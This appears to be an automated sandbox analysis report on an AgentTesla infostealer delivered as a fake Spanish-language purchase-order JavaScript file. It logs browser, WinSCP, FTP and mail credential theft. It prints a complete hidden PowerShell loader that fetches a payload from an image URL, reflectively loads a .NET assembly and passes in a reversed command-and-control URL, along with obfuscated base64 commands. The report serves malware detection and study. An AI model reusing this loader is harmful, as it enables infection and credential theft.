? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\alarvice.js"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mq? ? ? ? ?w? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bl? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bo? ? ? ? ?g4? ? ? ? ?bwb0? ? ? ? ?gu? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?v? ? ? ? ?gq? ? ? ? ?zqbh? ? ? ? ?hq? ? ? ? ?a? ? ? ? ?bu? ? ? ? ?g8? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?c4? ? ? ? ?agbw? ? ? ? ?gc? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?tgbl? ? ? ? ?hc? ? ? ? ?lqbp? ? ? ? ?gi? ? ? ? ?agbl? ? ? ? ?gm? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?tgbl? ? ? ? ?hq? ? ? ? ?lgbx? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c4? ? ? ? ?r? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?eq? ? ? ? ?yqb0? ? ? ? ?ge? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbv? ? ? ? ?hi? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bb? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eu? ? ? ? ?bgbj? ? ? ? ?g8? ? ? ? ?z? ? ? ? ?bp? ? ? ? ?g4? ? ? ? ?zwbd? ? ? ? ?do? ? ? ? ?ogbv? ? ? ? ?fq? ? ? ? ?rg? ? ? ? ?4? ? ? ? ?c4? ? ? ? ?rwbl? ? ? ? ?hq? ? ? ? ?uwb0? ? ? ? ?hi? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?cwb0? ? ? ? ?ge? ? ? ? ?cgb0? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb? ? ? ? ?fm? ? ? ? ?rq? ? ? ? ?2? ? ? ? ?dq? ? ? ? ?xwbt? ? ? ? ?fq? ? ? ? ?qqbs? ? ? ? ?fq? ? ? ? ?pg? ? ? ? ?+? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gu? ? ? ? ?bgbk? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ngro/gol/moc.onapnape//:sptth' , '1' , 'c:\programdata\' , 'alarvice','installutil','desativado'))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mq? ? ? ? ?w? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bl? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bo? ? ? ? ?g4? ? ? ? ?bwb0? ? ? ? ?gu? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?v? ? ? ? ?gq? ? ? ? ?zqbh? ? ? ? ?hq? ? ? ? ?a? ? ? ? ?bu? ? ? ? ?g8? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?c4? ? ? ? ?agbw? ? ? ? ?gc? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?tgbl? ? ? ? ?hc? ? ? ? ?lqbp? ? ? ? ?gi? ? ? ? ?agbl? ? ? ? ?gm? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?tgbl? ? ? ? ?hq? ? ? ? ?lgbx? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c4? ? ? ? ?r? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?eq? ? ? ? ?yqb0? ? ? ? ?ge? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbv? ? ? ? ?hi? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bb? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eu? ? ? ? ?bgbj? ? ? ? ?g8? ? ? ? ?z? ? ? ? ?bp? ? ? ? ?g4? ? ? ? ?zwbd? ? ? ? ?do? ? ? ? ?ogbv? ? ? ? ?fq? ? ? ? ?rg? ? ? ? ?4? ? ? ? ?c4? ? ? ? ?rwbl? ? ? ? ?hq? ? ? ? ?uwb0? ? ? ? ?hi? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?cwb0? ? ? ? ?ge? ? ? ? ?cgb0? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb? ? ? ? ?fm? ? ? ? ?rq? ? ? ? ?2? ? ? ? ?dq? ? ? ? ?xwbt? ? ? ? ?fq? ? ? ? ?qqbs? ? ? ? ?fq? ? ? ? ?pg? ? ? ? ?+? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gu? ? ? ? ?bgbk? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb?	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ngro/gol/moc.onapnape//:sptth' , '1' , 'c:\programdata\' , 'alarvice','installutil','desativado'))"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.1cb958bf960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2946845698.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2946845698.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2946845698.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7736, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.1cb958bf960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2946845698.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7736, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.1cb958bf960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2946845698.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2946845698.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2946845698.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7736, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	Valid Accounts	231 Windows Management Instrumentation	22 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	211 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	1 Credentials in Registry	531 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	261 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	11%	ReversingLabs

Source	Detection	Scanner	Label
